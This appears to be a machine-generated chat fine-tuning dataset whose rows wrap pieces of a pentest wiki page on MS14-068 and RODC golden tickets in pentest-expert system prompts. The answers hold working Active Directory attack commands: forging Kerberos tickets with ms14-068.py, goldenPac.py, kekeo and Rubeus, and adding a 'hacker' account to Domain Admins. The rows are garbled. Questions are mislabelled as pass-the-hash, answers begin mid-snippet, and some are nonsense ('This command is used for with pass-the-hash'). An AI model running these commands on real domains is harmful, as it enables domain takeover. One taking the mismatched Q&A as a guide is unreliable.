[{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain with pass-the-hash"}, {"role": "assistant", "content": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" --rc4 \"$NT_HASH\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"\n``\n\nOnce the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).\n\n`bash\ngetST.py -k -no-pass -spn 'any_valid_spn' \"$DOMAIN\"/\"$USER\"\n`\n\nThis step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, DCSync for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with describeTicket.py and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's usingkerberos:ptt command, and then create a new user and add it to the domain admins group.\n> \n> `bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> `\n\n---\nImpacket (goldenPac.py)\n\nThe attack can also be carried out automatically using Impacket's goldenPac.py (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the -w path parameter.\n\n`bash\ngoldenPac.py \"$DOMAIN_FQDN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\" -dc-ip \"$DC_IP\"\n`\n\n---\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain with pass-the-hash", "response": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" --rc4 \"$NT_HASH\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"\n``\n\nOnce the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).\n\n`bash\ngetST.py -k -no-pass -spn 'any_valid_spn' \"$DOMAIN\"/\"$USER\"\n`\n\nThis step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, DCSync for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with describeTicket.py and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's usingkerberos:ptt command, and then create a new user and add it to the domain admins group.\n> \n> `bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> `\n\n---\nImpacket (goldenPac.py)\n\nThe attack can also be carried out automatically using Impacket's goldenPac.py (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the -w path parameter.\n\n`bash\ngoldenPac.py \"$DOMAIN_FQDN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\" -dc-ip \"$DC_IP\"\n`\n\n---\n", "metadata": {"corpus_index": 609, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with pass-the-hash?"}, {"role": "assistant", "content": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" --rc4 \"$NT_HASH\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"\n``\n\nOnce the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).\n\n`bash\ngetST.py -k -no-pass -spn 'any_valid_spn' \"$DOMAIN\"/\"$USER\"\n`\n\nThis step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, DCSync for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with describeTicket.py and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's usingkerberos:ptt command, and then create a new user and add it to the domain admins group.\n> \n> `bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> `\n\n---\nImpacket (goldenPac.py)\n\nThe attack can also be carried out automatically using Impacket's goldenPac.py (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the -w path parameter.\n\n`bash\ngoldenPac.py \"$DOMAIN_FQDN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\" -dc-ip \"$DC_IP\"\n`\n\n---\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with pass-the-hash?", "response": "ms14-068.py -u \"$BASICUSER\"@\"$DOMAIN_FQDN\" --rc4 \"$NT_HASH\" -s \"$BASICUSER_SID\" -d \"$DC_HOST\"\n``\n\nOnce the .ccache TGT is obtained, if the attack is successful, the ticket will be usable with pass-the-ticket. An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's getST.py (Python).\n\n`bash\ngetST.py -k -no-pass -spn 'any_valid_spn' \"$DOMAIN\"/\"$USER\"\n`\n\nThis step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, DCSync for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with describeTicket.py and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the .ccache ticket on UNIX-like systems. What I did was convert it to .kirbi, switch to a Windows system, inject the ticket with mimikatz's usingkerberos:ptt command, and then create a new user and add it to the domain admins group.\n> \n> `bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> `\n\n---\nImpacket (goldenPac.py)\n\nThe attack can also be carried out automatically using Impacket's goldenPac.py (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the -w path parameter.\n\n`bash\ngoldenPac.py \"$DOMAIN_FQDN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\" -dc-ip \"$DC_IP\"\n`\n\n---\n", "metadata": {"corpus_index": 609, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Once command to with pass-the-hash"}, {"role": "assistant", "content": "Once the `.ccache` TGT is obtained, if the attack is successful, the ticket will be usable with [pass-the-ticket](../ptt.md). An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's [getST.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Once command to with pass-the-hash", "response": "Once the `.ccache` TGT is obtained, if the attack is successful, the ticket will be usable with [pass-the-ticket](../ptt.md). An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's [getST.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python).", "metadata": {"corpus_index": 610, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out with pass-the-hash during a pentest?"}, {"role": "assistant", "content": "Once the `.ccache` TGT is obtained, if the attack is successful, the ticket will be usable with [pass-the-ticket](../ptt.md). An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's [getST.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out with pass-the-hash during a pentest?", "response": "Once the `.ccache` TGT is obtained, if the attack is successful, the ticket will be usable with [pass-the-ticket](../ptt.md). An easy way to check if the TGT works is to use it and ask for a service ticket. This can be done with Impacket's [getST.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python).", "metadata": {"corpus_index": 610, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the This syntax for with pass-the-hash?"}, {"role": "assistant", "content": "This step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, [DCSync](../../credentials/dumping/dcsync.md) for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with [describeTicket.py](https://github.com/fortra/impacket/pull/1201) and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the `.ccache` ticket on UNIX-like systems. What I did was [convert it](../ptt.md#practice) to `.kirbi`, switch to a Windows system, inject the ticket with mimikatz's using[`kerberos:ptt`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/ptt) command, and then create a new user and add it to the domain admins group.\n> \n> ```bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> ```\n\n---\n**Impacket (goldenPac.py)**\n\nThe attack can also be carried out automatically using Impacket's [goldenPac.py](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the `-w path` parameter."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the This syntax for with pass-the-hash?", "response": "This step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, [DCSync](../../credentials/dumping/dcsync.md) for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with [describeTicket.py](https://github.com/fortra/impacket/pull/1201) and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the `.ccache` ticket on UNIX-like systems. What I did was [convert it](../ptt.md#practice) to `.kirbi`, switch to a Windows system, inject the ticket with mimikatz's using[`kerberos:ptt`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/ptt) command, and then create a new user and add it to the domain admins group.\n> \n> ```bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> ```\n\n---\n**Impacket (goldenPac.py)**\n\nThe attack can also be carried out automatically using Impacket's [goldenPac.py](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the `-w path` parameter.", "metadata": {"corpus_index": 611, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "This"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with pass-the-hash"}, {"role": "assistant", "content": "This step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, [DCSync](../../credentials/dumping/dcsync.md) for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with [describeTicket.py](https://github.com/fortra/impacket/pull/1201) and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the `.ccache` ticket on UNIX-like systems. What I did was [convert it](../ptt.md#practice) to `.kirbi`, switch to a Windows system, inject the ticket with mimikatz's using[`kerberos:ptt`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/ptt) command, and then create a new user and add it to the domain admins group.\n> \n> ```bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> ```\n\n---\n**Impacket (goldenPac.py)**\n\nThe attack can also be carried out automatically using Impacket's [goldenPac.py](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the `-w path` parameter."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with pass-the-hash", "response": "This step will only make sure the TGT works though. It will not indicate for sure that the attack worked. This is because a patched DC could ignore the forged PAC and include a legitimate PAC instead. But the TGT would still be valid. It would simply be \"unprivileged\". Trying to use the service ticket for a privileged taks, [DCSync](../../credentials/dumping/dcsync.md) for instance, is advised.\n\n> [!TIP]\n> Another way of knowing, for sure, if the target DC is patched or not is to decrypt the ticket obtained with [describeTicket.py](https://github.com/fortra/impacket/pull/1201) and make sure the PAC features the privileged groups (512, 518, 519, 520). If the privileged groups are missing, it means the DC is patched and the forged PAC was ignored and replaced with a legitimate one. Knowing the krbtgt key is needed, so this would best fit a whitebox audit scenario (or successful pentest).\n\n> [!NOTE]\n> In some scenarios, I personally have had trouble using the `.ccache` ticket on UNIX-like systems. What I did was [convert it](../ptt.md#practice) to `.kirbi`, switch to a Windows system, inject the ticket with mimikatz's using[`kerberos:ptt`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/ptt) command, and then create a new user and add it to the domain admins group.\n> \n> ```bash\n> net user \"hacker\" \"132Pentest!!!\" /domain /add\n> net group \"Domain Admins\" /domain /add\n> ```\n\n---\n**Impacket (goldenPac.py)**\n\nThe attack can also be carried out automatically using Impacket's [goldenPac.py](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) (Python). This tool conducts the attack and tries to open a privileged session using the obtained TGT and PsExec. The TGT can be stored locally with the `-w path` parameter.", "metadata": {"corpus_index": 611, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with pass-the-hash?"}, {"role": "assistant", "content": "---\n**Metasploit Framework**\n\nThe Metasploit Framework can also be useful in the sense that it prints valuable error information."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with pass-the-hash?", "response": "---\n**Metasploit Framework**\n\nThe Metasploit Framework can also be useful in the sense that it prints valuable error information.", "metadata": {"corpus_index": 612, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `---`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. with pass-the-hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `---`?", "response": "This command is used for with pass-the-hash. with pass-the-hash", "metadata": {"corpus_index": 612, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with pass-the-hash"}, {"role": "assistant", "content": "=== Windows\n\n**Kekeo**\n\nPrerequisite : Build ms14068.exe following [kekeo's documentation](https://github.com/gentilkiwi/kekeo#readme)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with pass-the-hash", "response": "=== Windows\n\n**Kekeo**\n\nPrerequisite : Build ms14068.exe following [kekeo's documentation](https://github.com/gentilkiwi/kekeo#readme).", "metadata": {"corpus_index": 613, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for with pass-the-hash. with pass-the-hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for with pass-the-hash. with pass-the-hash", "metadata": {"corpus_index": 613, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe domain SID and user RID are automaticaly discovered in the context of penetration testing"}, {"role": "assistant", "content": "ms14068.exe /domain:$domain /user:$user /password:$password /kdc:$VULN_KDC_FQDN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe domain SID and user RID are automaticaly discovered in the context of penetration testing", "response": "ms14068.exe /domain:$domain /user:$user /password:$password /kdc:$VULN_KDC_FQDN", "metadata": {"corpus_index": 614, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through domain SID and user RID are automaticaly discovered"}, {"role": "assistant", "content": "ms14068.exe /domain:$domain /user:$user /password:$password /kdc:$VULN_KDC_FQDN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through domain SID and user RID are automaticaly discovered", "response": "ms14068.exe /domain:$domain /user:$user /password:$password /kdc:$VULN_KDC_FQDN", "metadata": {"corpus_index": 614, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of note that automatic discovery of the user SID is not possible when using hash"}, {"role": "assistant", "content": "ms14068.exe /domain:$domain /user:$user /key:$krbtgt_NThash /sid:$DomainSID /rid:$userRelativeID /kdc:$KDC_FQDN\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of note that automatic discovery of the user SID is not possible when using hash", "response": "ms14068.exe /domain:$domain /user:$user /key:$krbtgt_NThash /sid:$DomainSID /rid:$userRelativeID /kdc:$KDC_FQDN\n```\n\n:::", "metadata": {"corpus_index": 615, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out note that automatic discovery of the user SID is not possible when using hash during a pentest?"}, {"role": "assistant", "content": "ms14068.exe /domain:$domain /user:$user /key:$krbtgt_NThash /sid:$DomainSID /rid:$userRelativeID /kdc:$KDC_FQDN\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out note that automatic discovery of the user SID is not possible when using hash during a pentest?", "response": "ms14068.exe /domain:$domain /user:$user /key:$krbtgt_NThash /sid:$DomainSID /rid:$userRelativeID /kdc:$KDC_FQDN\n```\n\n:::", "metadata": {"corpus_index": 615, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/ms14-068.md", "page_title": "MS14-068", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about RODC Golden tickets - Theory?"}, {"role": "assistant", "content": "With administrative access to an RODC, it is possible to dump all the cached credentials, including those of thekrbtgt_XXXXX account. The hash can be used to forge a \"RODC golden ticket\" for any account in the msDS-RevealOnDemandGroup and not in the msDS-NeverRevealGroup attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).\n\n> [!TIP]\n> When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about RODC Golden tickets - Theory?", "response": "With administrative access to an RODC, it is possible to dump all the cached credentials, including those of thekrbtgt_XXXXX account. The hash can be used to forge a \"RODC golden ticket\" for any account in the msDS-RevealOnDemandGroup and not in the msDS-NeverRevealGroup attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).\n\n> [!TIP]\n> When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST).", "metadata": {"corpus_index": 616, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md", "page_title": "RODC Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on RODC Golden tickets - Theory"}, {"role": "assistant", "content": "With administrative access to an RODC, it is possible to dump all the cached credentials, including those of thekrbtgt_XXXXX account. The hash can be used to forge a \"RODC golden ticket\" for any account in the msDS-RevealOnDemandGroup and not in the msDS-NeverRevealGroup attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).\n\n> [!TIP]\n> When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on RODC Golden tickets - Theory", "response": "With administrative access to an RODC, it is possible to dump all the cached credentials, including those of thekrbtgt_XXXXX account. The hash can be used to forge a \"RODC golden ticket\" for any account in the msDS-RevealOnDemandGroup and not in the msDS-NeverRevealGroup attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).\n\n> [!TIP]\n> When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST).", "metadata": {"corpus_index": 616, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md", "page_title": "RODC Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does RODC Golden tickets - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n_For the moment, no tool is available to only forge a RODC Golden Ticket from UNIX-like systems._\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose.\n\n``powershell\nRubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID\n``\n\n:::\n\n> [!TIP]\n> > The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the _kvno_ field of the ticket. \n> >\n> > _(Elad Shamir on_ _specterops.io__)_"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does RODC Golden tickets - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\n_For the moment, no tool is available to only forge a RODC Golden Ticket from UNIX-like systems._\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for this purpose.\n\n``powershell\nRubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID 